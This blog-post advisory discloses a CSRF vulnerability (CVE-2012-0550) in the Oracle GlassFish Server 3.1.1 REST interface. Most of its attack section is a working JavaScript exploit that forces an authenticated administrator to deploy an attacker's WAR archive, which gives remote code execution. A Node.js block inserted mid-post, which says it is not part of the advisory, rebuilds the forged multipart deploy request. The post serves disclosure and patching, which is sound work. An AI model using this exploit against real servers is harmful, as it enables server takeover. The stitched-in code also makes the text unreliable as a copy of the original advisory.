For more information, visit: <a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html">http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html</a>Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-73883065203032949932012-04-19T03:28:00.000+02:002012-04-19T03:28:56.267+02:00Oracle GlassFish Server - REST CSRFTime for some disclosure. Below are the details of a CSRF bug discovered in Oracle GlassFish Server 3.1.1 a few months ago. It is interesting to observe that Oracle rates this as the <a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS">third most critical bug</a> fixed among the Oracle Sun Products. I guess that's because of the exploit that was included in the original report, which I am releasing as part of this advisory. I found a curious angle to exploit this bug: the forged request can upload an arbitrary WAR archive. Quite a cool way to exploit a CSRF and own Oracle GlassFish, if you ask me :-). Enjoy.<br />
<br />
<b>Details</b><br />
<br />
<b>Vendor Site: </b>Oracle (www.oracle.com)<br />
<span style="font-weight: bold;">Date: </span>April 19th, 2012 – CVE-2012-0550<br />
<span style="font-weight: bold;">Affected Software: </span>Oracle GlassFish Server 3.1.1 (build 12)<br />
<span style="font-weight: bold;">Researcher: </span>Roberto Suggi Liverani<br />
<div><span style="font-weight: bold;">PDF version: </span><a href="http://www.security-assessment.com/files/documents/advisory/Oracle_GlassFish_Server_REST_CSRF.pdf">http://www.security-assessment.com/files/documents/advisory/Oracle_GlassFish_Server_REST_CSRF.pdf</a></div><br />
<br />
<b>Description</b><br />
<b><br />
</b>Security-Assessment.com has discovered that the Oracle GlassFish Server REST interface is vulnerable to Cross Site Request Forgery (CSRF) attacks. Although the javax.faces.ViewState employed in the standard web administrative interface prevents such attacks there, the REST interface remains vulnerable, as shown in the Proof-of-Concept (PoC) below.<br />
<div style="font-weight: bold;"><br />
</div><div style="font-weight: bold;">Exploitation </div><div style="font-weight: bold;"><br />
</div>Cross Site Request Forgery attacks can target different functionality within an application. In this case, as an example, it is possible to force an authenticated administrator into uploading an arbitrary WAR archive, which can then be used to gain remote code execution on the server running Oracle GlassFish Server.<br />
<br />
The Proof-of-Concept (PoC) below has been successfully tested with Firefox 8.0.1 and Chrome 15.0.874.121 with Basic Authentication enabled.<br />
<br />
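Before the PoC itself, here is an added example (not part of the advisory or its PoC) of the part the forged request depends on: building the multipart/form-data body that carries the WAR bytes in the file part named "id", the field name the PoC uses, and parsing it back the way the receiving servlet would, so the binary content can be checked to survive intact. The plain fields are a subset of the deploy parameters the PoC sends, the endpoint is only named in a comment and not contacted, and the WAR content is a constructed placeholder.

```javascript
// Added example (not the advisory's PoC): build the multipart/form-data body
// of a forged WAR deploy request, then parse it back the way the receiving
// servlet would, to check that the binary file part survives intact.
// Target endpoint named in the advisory, not contacted by this code:
//   POST /management/domain/applications/application  (file part named "id")

function buildMultipart(fields, fileField, fileName, fileBytes, boundary) {
  const CRLF = '\r\n';
  const chunks = [];
  for (const [name, value] of Object.entries(fields)) {
    chunks.push(Buffer.from(
      `--${boundary}${CRLF}Content-Disposition: form-data; name="${name}"${CRLF}${CRLF}${value}${CRLF}`));
  }
  // File part: declared as octet-stream and sent as raw bytes, no base64.
  chunks.push(Buffer.from(
    `--${boundary}${CRLF}Content-Disposition: form-data; name="${fileField}"; filename="${fileName}"${CRLF}` +
    `Content-Type: application/octet-stream${CRLF}${CRLF}`));
  chunks.push(Buffer.from(fileBytes));
  chunks.push(Buffer.from(`${CRLF}--${boundary}--${CRLF}`));
  return Buffer.concat(chunks);
}

// Minimal multipart parser: returns { name, filename, data } per part. It
// assumes the boundary does not occur inside any part, which is why the
// boundary generated below is long and random.
function parseMultipart(body, boundary) {
  const delim = Buffer.from('--' + boundary);
  const parts = [];
  let pos = body.indexOf(delim);
  while (pos !== -1) {
    let start = pos + delim.length;
    if (body.subarray(start, start + 2).toString() === '--') break; // closing delimiter
    start += 2; // CRLF after the delimiter
    const next = body.indexOf(delim, start);
    if (next === -1) break;
    const part = body.subarray(start, next - 2); // drop CRLF preceding next delimiter
    const sep = part.indexOf('\r\n\r\n');
    if (sep === -1) break;
    const headers = part.subarray(0, sep).toString();
    const name = /name="([^"]*)"/.exec(headers);
    const filename = /filename="([^"]*)"/.exec(headers);
    parts.push({
      name: name ? name[1] : null,
      filename: filename ? filename[1] : null,
      data: part.subarray(sep + 4),
    });
    pos = next;
  }
  return parts;
}

// A subset of the deploy parameters the PoC sends as plain fields.
const DEPLOY_FIELDS = {
  asyncreplication: 'true', availabilityenabled: 'false', contextroot: '',
  enabled: 'true', force: 'false', isredeploy: 'false', name: '', target: '',
  __remove_empty_entries__: 'true',
};

function forgedDeployRequest(warBytes, fileName) {
  const boundary = '---------------------------' + Date.now().toString(16) +
    Math.random().toString(16).slice(2);
  return {
    contentType: 'multipart/form-data; boundary=' + boundary,
    boundary,
    body: buildMultipart(DEPLOY_FIELDS, 'id', fileName, warBytes, boundary),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed placeholder bytes (a ZIP local-file header plus junk), not a real WAR.
  const war = Buffer.from([0x50, 0x4b, 0x03, 0x04, 0x00, 0xff, 0x0d, 0x0a, 0x0d, 0x0a]);
  const req = forgedDeployRequest(war, 'evil.war');
  for (const p of parseMultipart(req.body, req.boundary)) {
    console.log(p.name, p.filename || '-', p.data.length, 'bytes');
  }
}
```

The point of the round trip is the one the PoC's sendAsBinary gymnastics are about: the file part has to reach the server byte for byte, including NUL, 0xFF and CRLF sequences, or the deployed archive will not be a valid WAR.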
<i>Arbitrary WAR Archive File Upload – CSRF PoC</i><br />
<pre class="brush:text;" name="code" style="font-family: Arial,Helvetica,sans-serif;"><h1>Oracle GlassFish Server 3.1.1 (build 12) - CSRF arbitrary file upload</h1>by Roberto Suggi Liverani - Security-Assessment.com
This is a Proof-of-Concept - the start() function can be invoked automatically.
The CSRF upload technique used in this case is a slight variation of the technique demonstrated here:
http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html
Other pieces of code were taken from: http://hublog.hubmed.org/archives/001941.html
<button id="upload" onclick="start()" type="button">Upload WAR Archive</button>
<script>
// REST deployment endpoint of the GlassFish administration interface
var logUrl = 'http://glassfishserver/management/domain/applications/application';

function fileUpload(fileData, fileName) {
    var fileSize = fileData.length,
        boundary = "---------------------------270883142628617",
        uri = logUrl,
        xhr = new XMLHttpRequest();
    // form fields expected by the REST deployment resource
    var additionalFields = {
        asyncreplication: "true",
        availabilityenabled: "false",
        contextroot: "",
        createtables: "true",
        dbvendorname: "",
        deploymentplan: "",
        description: "",
        dropandcreatetables: "true",
        enabled: "true",
        force: "false",
        generatermistubs: "false",
        isredeploy: "false",
        keepfailedstubs: "false",
        keepreposdir: "false",
        keepstate: "true",
        lbenabled: "true",
        libraries: "",
        logReportedErrors: "true",
        name: "",
        precompilejsp: "false",
        properties: "",
        property: "",
        retrieve: "",
        target: "",
        type: "",
        uniquetablenames: "true",
        verify: "false",
        virtualservers: "",
        __remove_empty_entries__: "true"
    };
    if (typeof XMLHttpRequest.prototype.sendAsBinary == "function") { // Firefox 3 & 4
        // keep only the low byte of each character so the archive bytes are sent unmodified
        var tmp = '';
        for (var i = 0; i < fileData.length; i++) {
            tmp += String.fromCharCode(fileData.charCodeAt(i) & 0xff);
        }
        fileData = tmp;
    } else { // Chrome 9
        // http://javascript0.org/wiki/Portable_sendAsBinary
        XMLHttpRequest.prototype.sendAsBinary = function(text) {
            var data = new ArrayBuffer(text.length);
            var ui8a = new Uint8Array(data, 0);
            for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);
            var bb = new (window.BlobBuilder || window.WebKitBlobBuilder)();
            bb.append(data);
            var blob = bb.getBlob();
            this.send(blob);
        };
    }
    var fileFieldName = "id";
    xhr.open("POST", uri, true);
    // simulate a file MIME POST request
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
    xhr.setRequestHeader("Content-Length", fileSize);
    // the browser attaches the victim's cookies / Basic Authentication credentials
    xhr.withCredentials = "true";
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
            // only HTTP 200 (or 304) is treated as a successful deployment
            if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {
                if (xhr.responseText != "") {
                    alert(JSON.parse(xhr.responseText).msg);
                }
            } else if (xhr.status == 0) {
            }
        }
    };
    // build the multipart/form-data body by hand
    var body = "";
    for (var i in additionalFields) {
        if (additionalFields.hasOwnProperty(i)) {
            body += addField(i, additionalFields[i], boundary);
        }
    }
    body += addFileField(fileFieldName, fileData, fileName, boundary);
    body += "--" + boundary + "--";
    xhr.sendAsBinary(body);
    return true;
}

// one ordinary form field of the multipart body
function addField(name, value, boundary) {
    var c = "--" + boundary + "\r\n";
    c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n';
    c += value + "\r\n";
    return c;
}

// the file part of the multipart body
function addFileField(name, value, filename, boundary) {
    var c = "--" + boundary + "\r\n";
    c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n';
    c += "Content-Type: application/octet-stream\r\n\r\n";
    c += value + "\r\n";
    return c;
}

// fetch the archive from the attacker's own site as a binary string (synchronous request)
function getBinary(file) {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", file, false);
    xhr.overrideMimeType("text/plain; charset=x-user-defined");
    xhr.send(null);
    return xhr.responseText;
}

function readBinary(data) {
    var tmp = '';
    for (var i = 0; i < data.length; i++) {
        tmp += String.fromCharCode(data.charCodeAt(i) & 0xff);
    }
    return tmp;
}

function start() {
    var c = getBinary('maliciousarchive.war');
    fileUpload(c, "maliciousarchive.war");
}
</script>
</pre><br />
<b>Solution</b><br />
<br />
Oracle has created a fix for this vulnerability, which is included in the Critical Patch Update Advisory - April 2012. Security-Assessment.com recommends applying the latest patch provided by the vendor.<br />
For more information, visit: <a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html">http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html</a><br />